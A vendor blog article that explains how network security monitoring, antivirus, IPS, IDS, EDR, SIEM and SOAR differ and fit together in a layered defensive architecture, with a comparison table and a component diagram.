NSM vs AV vs IPS vs IDS vs EDR: What Your Security Architecture Is Probably Missing
Many organizations believe they are "secure" because they have a firewall and antivirus installed.
Then a breach happens.
The reason? Most teams misunderstand the difference between NSM, AV, IPS, IDS, and EDR — and more importantly, how they should work together.
This article explains each component clearly and shows how modern security architecture actually works.
Why One Security Tool Is Never Enough
Cyber attacks today are:
- Encrypted
- Fileless
- Behavior‑based
- Living-off-the-land
- Designed to bypass signature detection
No single tool can detect all of this.
Security today is about layered visibility and control.
Let’s break down each layer.
1. NSM (Network Security Monitoring)
The Visibility Layer
Network Security Monitoring focuses on deep inspection and long-term analysis of network traffic.
Unlike IPS, NSM does not primarily block traffic. Its job is to observe, record, detect patterns, and support investigation.
Think of NSM as CCTV for your network — always watching, always recording.
What NSM Collects
- Full packet capture (PCAP)
- NetFlow / Traffic metadata
- DNS logs
- HTTP logs
- SSL/TLS metadata
- Firewall logs
- IDS alerts
What NSM Is Good At
- Detecting lateral movement inside the network
- Detecting data exfiltration
- Identifying suspicious DNS tunneling
- Supporting forensic investigations
- Providing historical visibility
If an attacker bypasses your firewall and AV, NSM is often the system that reveals what actually happened.
2. AV (Antivirus)
The Basic Endpoint Protection Layer
Antivirus runs directly on endpoints:
- Windows
- macOS
- Linux
- Servers
- Workstations
It scans files and memory for known malicious signatures.
What AV Does Well
- Detect known malware
- Stop common ransomware variants
- Quarantine infected files
Where AV Fails
- Fileless attacks
- PowerShell abuse
- Credential dumping
- Advanced persistent threats
AV is necessary — but it is not sufficient.
3. IPS (Intrusion Prevention System)
The Real-Time Blocking Layer
IPS sits inline in your network path:
Internet → Firewall → IPS → Internal Network
It inspects traffic in real time and blocks known malicious activity.
What IPS Does
- Blocks malicious IP addresses
- Stops exploit attempts
- Drops suspicious packets
- Prevents command-and-control traffic
IPS is your network gatekeeper.
However, IPS focuses on prevention — not deep investigation.
4. IDS (Intrusion Detection System)
The Alerting Layer
IDS monitors traffic but does not block it.
It generates alerts when suspicious behavior is detected.
IDS is often used when organizations want visibility without risking false-positive blocking.
Think of IDS as an alarm system.
5. EDR (Endpoint Detection & Response)
The Advanced Endpoint Intelligence Layer
EDR is the evolution of traditional antivirus.
Instead of just scanning files, EDR monitors behavior.
What EDR Detects
- Suspicious PowerShell execution
- Credential dumping activity
- Abnormal process chains
- Lateral movement techniques
What EDR Can Do
- Detect
- Block
- Investigate
- Isolate compromised machines
If AV is a guard, EDR is a trained investigator.
Side-by-Side Comparison
| System | Runs Where | Detect | Block | Investigation Depth | Focus |
|---|---|---|---|---|---|
| AV | Endpoint | Yes | Yes | Low | Known malware |
| EDR | Endpoint | Yes | Yes | High | Behavior-based |
| IDS | Network | Yes | No | Medium | Alerts |
| IPS | Network | Yes | Yes | Medium | Prevention |
| NSM | Network | Yes | Usually No | Very High | Visibility |
| SIEM | Log layer | Yes | No | Correlation | Central analysis |
How Modern Security Architecture Works
A mature architecture combines all layers:
Endpoints → AV / EDR
Network → IDS / IPS
Traffic Visibility → NSM
Central Log Correlation → SIEM
Automation & Orchestration → SOAR
Each layer covers blind spots of the others.
System Diagram (How These Components Fit Together)
flowchart TB
Internet["Internet"] --> FW["Firewall"]
FW --> IPS["IPS (Inline Blocking)"]
IPS --> LAN["Internal Network (LAN)"]
%% Endpoint layer
LAN --> EP["Endpoints / Servers"]
EP --> AV["AV (File/Signature Protection)"]
EP --> EDR["EDR (Behavior + Response)"]
%% Detection vs prevention on the network
LAN --> IDS["IDS (Alerting)"]
LAN --> NSM["NSM (Zeek/PCAP/Flow Visibility)"]
%% Telemetry to SIEM
FW --> SIEM["SIEM (Correlation)"]
IPS --> SIEM
IDS --> SIEM
NSM --> SIEM
AV --> SIEM
EDR --> SIEM
%% Automation
SIEM --> SOAR["SOAR (Automation/Orchestration)"]
SOAR --> RESP["Response Actions
- Block IP / isolate host
- Create ticket
- Notify SOC
- Run playbook"]
%% Notes
classDef layer fill:#fff,stroke:#999,stroke-width:1px;
class Internet,FW,IPS,LAN,EP,AV,EDR,IDS,NSM,SIEM,SOAR,RESP layer;How to Read This Diagram
- Firewall + IPS are your front-line blockers.
- IDS detects suspicious network activity without blocking.
- NSM provides deep visibility (what happened, when, and how).
- AV + EDR protect endpoints where attacks often succeed.
- SIEM is the central brain that correlates signals from every layer.
- SOAR turns alerts into consistent response actions.
They are complementary — not replacements.
They are complementary — not replacements.
Executive Perspective: Why This Matters
When a customer says:
"We already have firewall and antivirus."
The real question is:
- Who detects lateral movement?
- Who sees encrypted DNS tunneling?
- Who reconstructs attacker timeline?
- Who correlates endpoint + network activity?
That is where NSM, EDR, SIEM, and automation become critical.
Final Takeaway
- AV protects files.
- EDR protects behavior.
- IPS blocks known network threats.
- IDS alerts suspicious traffic.
- NSM provides deep visibility and forensic power.
- SIEM correlates everything into intelligence.
Security today is not about one tool.
It is about layered defense, visibility, and response capability.
That is the foundation of modern cyber resilience.
Get in Touch with us
Chat with Us on LINE
iiitum1984
Related Posts
- The Accounting Software Your Firm Uses Is Built for Your Clients, Not for You
- 2026年本地大模型(Local LLM)硬件选型实用指南
- Choosing Hardware for Local LLMs in 2026: A Practical Sizing Guide
- Why Your Finance Team Spends 40% of Their Week on Work AI Can Now Do
- 用纯开源方案搭建生产级 SOC:Wazuh + DFIR-IRIS + 自研集成层实战记录
- How We Built a Real Security Operations Center With Open-Source Tools
- FarmScript:我们如何从零设计一门农业IoT领域特定语言
- FarmScript: How We Designed a Programming Language for Chanthaburi Durian Farmers
- 智慧农业项目为何止步于试点阶段
- Why Smart Farming Projects Fail Before They Leave the Pilot Stage
- ERP项目为何总是超支、延期,最终令人失望
- ERP Projects: Why They Cost More, Take Longer, and Disappoint More Than Expected
- AI Security in Production: What Enterprise Teams Must Know in 2026
- 弹性无人机蜂群设计:具备安全通信的无领导者容错网状网络
- Designing Resilient Drone Swarms: Leaderless-Tolerant Mesh Networks with Secure Communications
- NumPy广播规则详解:为什么`(3,)`和`(3,1)`行为不同——以及它何时会悄悄给出错误答案
- NumPy Broadcasting Rules: Why `(3,)` and `(3,1)` Behave Differently — and When It Silently Gives Wrong Answers
- 关键基础设施遭受攻击:从乌克兰电网战争看工业IT/OT安全
- Critical Infrastructure Under Fire: What IT/OT Security Teams Can Learn from Ukraine’s Energy Grid
- LM Studio代码开发的系统提示词工程:`temperature`、`context_length`与`stop`词详解
